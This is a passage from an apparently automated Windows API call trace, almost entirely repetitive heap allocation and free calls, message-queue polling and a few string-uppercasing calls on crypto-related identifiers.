(HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0162.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0162.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0162.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0162.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0162.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0162.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0162.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0162.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0162.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0162.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0162.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0162.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0162.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0162.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0162.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0162.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0162.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0162.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0162.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0162.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0162.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0162.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0162.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0162.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0162.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0162.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0162.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0162.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0162.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0162.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0162.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0162.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0162.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0162.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0162.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0162.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0162.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0162.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0162.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0162.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0162.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0162.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0162.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0162.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0162.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0162.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0162.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0162.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0162.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0162.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0162.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0162.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0162.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0162.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0162.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0162.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0162.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0162.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0162.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0162.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0162.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0162.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0162.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0162.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0162.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0162.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0162.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0162.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0162.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0162.738] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0162.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0162.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0162.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0162.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0162.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0162.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0162.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0162.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0162.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0162.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0162.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0162.738] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0162.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0162.738] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0162.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0162.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0162.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0162.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0162.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0162.739] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0162.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0162.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0162.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0162.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0162.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0162.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c68 [0162.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0162.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0162.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0162.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0162.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0162.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0162.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0162.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2f608) returned 0x3c1f660 [0162.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0162.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0162.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c68 | out: hHeap=0x970000) returned 1 [0162.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0162.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0162.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0162.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0162.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0162.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0162.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0162.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0162.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0162.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2f608) returned 0x3c8e010 [0162.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3c1f660 | out: hHeap=0x970000) returned 1 [0162.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0162.751] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0162.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0162.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0162.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0162.751] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0162.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0162.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0162.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0162.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0162.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0162.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0162.751] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0162.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0162.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0162.752] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0162.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0162.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0162.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50998 [0162.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0162.752] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0162.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe30 [0162.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0162.752] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0162.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe30 | out: hHeap=0x970000) returned 1 [0162.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0162.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50710 [0162.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0162.752] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0162.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0162.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0162.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0162.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0162.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0162.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0162.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0162.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0162.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0162.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508c0 [0162.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0162.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50920 [0162.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506c8 [0162.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506e0 [0162.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0162.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0162.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507e8 [0162.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50968 [0162.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50740 [0162.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0162.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0162.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0162.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0162.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0162.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0162.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0162.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0162.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0162.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0162.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0162.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0162.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0162.753] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0162.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0162.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0162.753] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0162.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0162.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0162.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0162.754] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0162.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0162.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0162.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50710 [0162.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0162.754] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0162.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0162.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0162.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0162.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0162.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0162.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0162.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0162.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0162.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0162.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0162.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0162.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0162.754] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0162.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0162.754] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0162.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0162.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0162.755] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0162.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0162.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0162.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0162.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0162.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0162.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0162.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0162.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0162.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0162.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0162.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0162.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2f608) returned 0x3c1f660 [0162.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0162.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0162.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2f608) returned 0x3cbd620 [0162.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0162.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0162.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3c1f660 | out: hHeap=0x970000) returned 1 [0162.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0162.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0162.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0162.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0162.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0162.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 